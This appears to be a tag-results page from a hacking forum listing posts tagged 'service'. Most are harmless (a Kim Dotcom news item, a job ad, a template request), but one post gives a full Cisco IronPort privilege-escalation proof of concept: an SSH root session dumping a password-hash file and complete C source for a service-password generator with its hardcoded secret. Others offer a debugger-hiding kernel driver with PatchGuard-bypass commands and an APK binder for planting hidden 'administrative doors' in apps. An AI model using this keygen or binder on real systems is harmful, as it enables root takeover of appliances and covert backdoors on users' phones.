Showing results for tags 'service'.

  1. xVIRal

    Vnc

    I thought I'd offer something to the community too, since I've only been asking for things until now
  2. Hesller

    VNC FRESH

  3. rukov

    TitanHide

    Overview

    TitanHide is a driver intended to hide debuggers from certain processes. The driver hooks various Nt* kernel functions (using SSDT table hooks) and modifies the return values of the original functions. To hide a process, you must pass a simple structure with a ProcessID and the hiding option(s) to enable, to the driver. The internal API is designed to add hooks with little effort, which means adding features is really easy.

    Features

      • ProcessDebugFlags (NtQueryInformationProcess)
      • ProcessDebugPort (NtQueryInformationProcess)
      • ProcessDebugObjectHandle (NtQueryInformationProcess)
      • DebugObject (NtQueryObject)
      • SystemKernelDebuggerInformation (NtQuerySystemInformation)
      • NtClose (STATUS_INVALID_HANDLE exception)
      • ThreadHideFromDebugger (NtSetInformationThread)
      • Protect DRx (HW BPs) (NtSetContextThread)

    Test environments

      • Windows 7 x64 & x86 (SP1)
      • Windows XP x86 (SP3)
      • Windows XP x64 (SP1)

    Compiling

      1. Install Visual Studio 2013 (Express Edition untested).
      2. Install the WDK.
      3. Open TitanHide.sln and hit compile!

    Installation Method 1

      1. Copy TitanHide.sys to %systemroot%\system32\drivers.
      2. Start ServiceManager.exe (available on the download page).
      3. Delete the old service (when present).
      4. Install a new service (specify the full path to TitanHide.sys).
      5. Start the service you just created.
      6. Use TitanHideGUI.exe to set hide options for a PID.

    Installation Method 2

      1. Copy TitanHide.sys to %systemroot%\system32\drivers.
      2. Run the following command to create the TitanHide service (sc expects a space after each "="):
             sc create TitanHide binPath= %systemroot%\system32\drivers\TitanHide.sys type= kernel
      3. Run the following command to start the TitanHide service:
             sc start TitanHide
      4. Run the following command to check if TitanHide is running:
             sc query TitanHide

    Testsigning & PatchGuard

    A simple way to 'bypass' PatchGuard on x64 systems is by enabling a local kernel debugger. This can be done by executing the following commands in an Administrator Console:

        bcdedit /set testsigning on
        bcdedit /debug on
        bcdedit /dbgsettings local /noumex

    In addition to the commands above you need to set BreakOnSysRq if you want to use the PrntScr button. Read this article for more information. You can also import BreakOnSysRq.reg to automatically fix this problem.

    Remarks

      • When using x64_dbg, you can use the TitanHide plugin (available on the download page).
      • When using EsetNod32 AV, disable "Realtime File Protection" to prevent a BSOD when starting TitanHide. You can re-enable it right afterwards.

    Download

    https://bitbucket.org/mrexodia/titanhide/downloads
  4. VNC-URI Pirates of Cyber
  5. /*
    Cisco Ironport Appliances Privilege Escalation Vulnerability
    Vendor: Cisco
    Product webpage: http://www.cisco.com
    Affected version(s):
        Cisco Ironport ESA - AsyncOS 8.5.5-280
        Cisco Ironport WSA - AsyncOS 8.0.5-075
        Cisco Ironport SMA - AsyncOS 8.3.6-0
    Date: 22/05/2014
    Credits: Glafkos Charalambous
    CVE: Not assigned by Cisco

    Disclosure Timeline:
    19-05-2014: Vendor Notification
    20-05-2014: Vendor Response/Feedback
    27-08-2014: Vendor Fix/Patch
    24-01-2015: Public Disclosure

    Description:
    Cisco Ironport appliances are vulnerable to authenticated "admin" privilege escalation.
    By enabling the Service Account from the GUI or CLI allows an admin to gain root access on the appliance, therefore bypassing all existing "admin" account limitations.
    The vulnerability is due to weak algorithm implementation in the password generation process which is used by Cisco to remotely access the appliance to provide technical support.

    Vendor Response:
    As anticipated, this is not considered a vulnerability but a security hardening issue. As such we did not assign a CVE however I made sure that this is fixed on SMA, ESA and WSA. The fix included several changes such as protecting better the algorithm in the binary, changing the algorithm itself to be more robust and enforcing password complexity when the administrator set the pass-phrase and enable the account.

    [SD] Note: Administrative credentials are needed in order to activate the access to support representative and to set up the pass-phrase that it is used to compute the final password.
    [GC] Still Admin user has limited permissions on the appliance and credentials can get compromised too, even with default password leading to full root access.

    [SD] This issue is tracked for the ESA by Cisco bug id: CSCuo96011 for the SMA by Cisco bug id: CSCuo96056 and for WSA by Cisco bug id CSCuo90528

    Technical Details:
    By logging in to the appliance using default password "ironport" or user specified one, there is an option to enable Customer Support Remote Access.
    This option can be found under Help and Support -> Remote Access on the GUI or by using the CLI console account "enablediag" and issuing the command service.
    Enabling this service requires a temporary user password which should be provided along with the appliance serial number to Cisco techsupport for remotely connecting and authenticating to the appliance.

    Having a temporary password and the serial number of the appliance by enabling the service account, an attacker can in turn get full root access as well as potentially damage it, backdoor it, etc.

    PoC:

    Enable Service Account
    ----------------------
    root@kali:~# ssh -lenablediag 192.168.0.158
    Password:
    Last login: Sat Jan 24 15:47:07 2015 from 192.168.0.163
    Copyright (c) 2001-2013, Cisco Systems, Inc.

    AsyncOS 8.5.5 for Cisco C100V build 280

    Welcome to the Cisco C100V Email Security Virtual Appliance

    Available Commands:
    help -- View this text.
    quit -- Log out.
    service -- Enable or disable access to the service system.
    network -- Perform emergency configuration of the diagnostic network interface.
    clearnet -- Resets configuration of the diagnostic network interface.
    ssh -- Configure emergency SSH daemon on the diagnostic network interface.
    clearssh -- Stop emergency SSH daemon on the diagnostic network interface.
    tunnel -- Start up tech support tunnel to IronPort.
    print -- Print status of the diagnostic network interface.
    reboot -- Reboot the appliance.

    S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
    Service Access currently disabled.
    ironport.example.com> service

    Service Access is currently disabled. Enabling this system will allow an
    IronPort Customer Support representative to remotely access your system
    to assist you in solving your technical issues. Are you sure you want
    to do this? [Y/N]> Y

    Enter a temporary password for customer support to use. This password may
    not be the same as your admin password. This password will not be able
    to be used to directly access your system.
    []> cisco123

    Service access has been ENABLED. Please provide your temporary password
    to your IronPort Customer Support representative.

    S/N 564DDFABBD0AD5F7A2E5-2C6019F508A4
    Service Access currently ENABLED (0 current service logins)
    ironport.example.com>

    Generate Service Account Password
    ---------------------------------
    Y:\Vulnerabilities\cisco\ironport>woofwoof.exe

    Usage: woofwoof.exe -p password -s serial
     -p <password> | Cisco Service Temp Password
     -s <serial> | Cisco Serial Number
     -h | This Help Menu

     Example: woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4

    Y:\Vulnerabilities\cisco\ironport>woofwoof.exe -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019
    F508A4
    Service Password: b213c9a4

    Login to the appliance as Service account with root privileges
    --------------------------------------------------------------
    root@kali:~# ssh -lservice 192.168.0.158
    Password:
    Last login: Wed Dec 17 21:15:24 2014 from 192.168.0.10
    Copyright (c) 2001-2013, Cisco Systems, Inc.

    AsyncOS 8.5.5 for Cisco C100V build 280

    Welcome to the Cisco C100V Email Security Virtual Appliance
    # uname -a
    FreeBSD ironport.example.com 8.2-RELEASE FreeBSD 8.2-RELEASE #0: Fri Mar 14 08:04:05 PDT 2014 auto-build@vm30esa0109.ibeng:/usr/build/iproot/freebsd/mods/src/sys/amd64/compile/MESSAGING_GATEWAY.amd64 amd64

    # cat /etc/master.passwd
    # $Header: //prod/phoebe-8-5-5-br/sam/freebsd/install/dist/etc/master.passwd#1 $
    root:*:0:0::0:0:Mr &:/root:/sbin/nologin
    service:$1$bYeV53ke$Q7hVZA5heeb4fC1DN9dsK/:0:0::0:0:Mr &:/root:/bin/sh
    enablediag:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:999:999::0:0:Administrator support access control:/root:/data/bin/enablediag.sh
    adminpassword:$1$aDeitl0/$BlmzKUSeRXoc4kcuGzuSP/:0:1000::0:0:Administrator Password Tool:/data/home/admin:/data/bin/adminpassword.sh
    daemon:*:1:1::0:0:Owner of many system processes:/root:/sbin/nologin
    operator:*:2:5::0:0:System &:/:/sbin/nologin
    bin:*:3:7::0:0:Binaries Commands and Source,,,:/:/sbin/nologin
    tty:*:4:65533::0:0:Tty Sandbox:/:/sbin/nologin
    kmem:*:5:65533::0:0:KMem Sandbox:/:/sbin/nologin
    man:*:9:9::0:0:Mister Man Pages:/usr/share/man:/sbin/nologin
    sshd:*:22:22::0:0:Secure Shell Daemon:/var/empty:/sbin/nologin
    nobody:*:65534:65534::0:0:Unprivileged user:/nonexistent:/sbin/nologin
    support:$1$FgFVb064$SmsZv/ez7Pf4wJLp5830s/:666:666::0:0:Mr &:/root:/sbin/nologin
    admin:$1$VvOyFxKd$OF2Cs/W0ZTWuGTtMvT5zc/:1000:1000::0:0:Administrator:/data/home/admin:/data/bin/cli.sh
    clustercomm:*:900:1005::0:0:Cluster Communication User:/data/home/clustercomm:/data/bin/command_proxy.sh
    smaduser:*:901:1007::0:0:Smad User:/data/home/smaduser:/data/bin/cli.sh
    spamd:*:783:1006::0:0:CASE User:/usr/case:/sbin/nologin
    pgsql:*:70:70::0:0:PostgreSQL pseudo-user:/usr/local/pgsql:/bin/sh
    ldap:*:389:389::0:0:OpenLDAP Server:/nonexistent:/sbin/nologin
    */

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <ctype.h>
    #include "md5.h"
    #include "getopt.h"

    #define MAX_BUFFER 128
    #define SECRET_PASS "woofwoof"

    void usage(char *name);
    void to_lower(char *str);
    void fuzz_string(char *str);

    int main(int argc, char *argv[])
    {
        if (argc < 2)
        {
            usage(argv[0]);
        }

        int opt;
        int index;
        char *temp_pass = { 0 };
        char *serial_no = { 0 };
        char *secret_pass = SECRET_PASS;
        char service[MAX_BUFFER] = { 0 };
        unsigned char digest[16] = { 0 };

        /* Parse -p (temporary password), -s (serial number) and -h (help). */
        while ((opt = getopt(argc, argv, "p:s:h")) != -1)
        {
            switch (opt)
            {
            case 'p':
                temp_pass = optarg;
                break;
            case 's':
                serial_no = optarg;
                break;
            case 'h':
                usage(argv[0]);
                break;
            default:
                printf_s("Wrong Argument: %s\n", argv[1]);
                break;
            }
        }

        /* Any leftover non-option argument is treated as a usage error. */
        for (index = optind; index < argc; index++)
        {
            usage(argv[0]);
            exit(0);
        }

        if (temp_pass == NULL || serial_no == NULL)
        {
            usage(argv[0]);
            exit(0);
        }

        if ((strlen(temp_pass) <= sizeof(service)) && (strlen(serial_no) <= sizeof(service)))
        {
            to_lower(serial_no);
            fuzz_string(temp_pass);

            /* Concatenate temporary password, serial number and the fixed secret. */
            strcpy_s(service, sizeof(service), temp_pass);
            strcat_s(service, sizeof(service), serial_no);
            strcat_s(service, sizeof(service), secret_pass);

            MD5_CTX context;
            MD5_Init(&context);
            MD5_Update(&context, service, strlen(service));
            MD5_Final(digest, &context);

            /* Print the first 4 bytes of the digest as hex. */
            printf_s("Service Password: ");
            for (int i = 0; i < sizeof(digest)-12; i++)
                printf("%02x", digest[i]);
        }

        return 0;
    }

    /* Replace '1' with 'i', '0' with 'o' and '_' with '-' in place. */
    void fuzz_string(char *str)
    {
        while (*str)
        {
            switch (*str)
            {
            case '1':
                *str = 'i';
                break;
            case '0':
                *str = 'o';
                break;
            case '_':
                *str = '-';
                break;
            }
            str++;
        }
    }

    /* Convert ASCII upper-case letters to lower case in place. */
    void to_lower(char *str)
    {
        while (*str)
        {
            if (*str >= 'A' && *str <= 'Z')
            {
                *str += 0x20;
            }
            str++;
        }
    }

    void usage(char *name)
    {
        printf_s("\nUsage: %s -p password -s serial\n", name);
        printf_s(" -p <password> | Cisco Service Temp Password\n");
        printf_s(" -s <serial> | Cisco Serial Number\n");
        printf_s(" -h | This Help Menu\n");
        printf_s("\n Example: %s -p cisco123 -s 564DDFABBD0AD5F7A2E5-2C6019F508A4\n", name);
        exit(0);
    }
  6. Internet entrepreneur Kim Dotcom has released an encrypted chat service, called MegaChat, to compete with the Microsoft-owned Skype. The release would be rolled out gradually, beginning with video-calling on Thursday, he said.

    The news came as it emerged a top EU official wants companies to be required by law to hand over encryption keys. The EU counter-terrorism coordinator's proposal follows a similar call by Prime Minister David Cameron.

    In a document leaked by the civil liberties group Statewatch, Gilles de Kerchove said encryption "increasingly makes lawful interception by the relevant national authorities technically difficult or even impossible". He wrote: "The [European] Commission should be invited to explore rules obliging internet and telecommunications companies operating in the EU to provide, under certain conditions as set out in the relevant national laws and in full compliance with fundamental rights, access of the relevant national authorities to communications (ie share encryption keys)." Mr De Kerchove refused to comment on the leaked document.

    Earlier this month, Mr Cameron said he wanted internet firms to allow the government to view encrypted messages in order to aid the security services. But his plans to revive the Communications Data Bill, dubbed the "snoopers' charter", were criticised by civil liberties groups and the Deputy Prime Minister, Nick Clegg.

    Announcing the launch of the beta version of his MegaChat service, Mr Dotcom said that video-calling would gradually be followed by a text-chat service and video-conferencing. About three years ago, Mr Dotcom's Megaupload site was seized and he was arrested in an armed raid on his New Zealand house.

    Announcing the launch of MegaChat on Twitter, he noted the timeline that led from the raid to Thursday's announcement, highlighting the launch of his new site, Mega, and a political party in the subsequent years. And he wrote: "#Mega offers a security bounty again. Please report any security flaw to us. We'll fix it and reward you. Thanks for helping."

    Mr Dotcom still faces extradition from New Zealand to the United States on copyright infringement charges. In November last year, he said he was "broke" as a result of the consequent legal fight. He put the cost at $10m (£6.4m) since his arrest in 2012.

    Source
  7. apk_binder_script allows us to unify two APKs into one, or to add a service APK's smali code to the target. It copies smali code, active and manifest. It implements a receiver acting as a loader, loading the class specified as a parameter (a service). The original application runs normally in parallel; the service is invoked by the loader based on two events:

    android.intent.action.BOOT_COMPLETED
    android.intent.action.ACTION_POWER_CONNECTED

    You can add actions and permissions as desired. In short, it allows us to "extend" the functionality of an APK, implement "administrative" doors, etc.

    Download: https://github.com/funsecurity/apk_binder_script
  8. If you know how to repair photo cameras, video cameras, audio and video systems, etc., anything in this range or that could fit into such a category, I can arrange an interview and a practical test for you, so you can prove what you claim to know. The job is at a Samsung-authorized service center in Bucharest. The schedule is 8 hours + 1 hour break. You must know electronics, stay calm even when you have a customer face to face, and have an idea of what needs to be repaired. I will give more details via PM.
  9. Hi, I need a flash or non-flash template for an IT service shop, but one that looks really good, business-like, elegant, etc. I couldn't find one on Template Monster, maybe you can help me. Thanks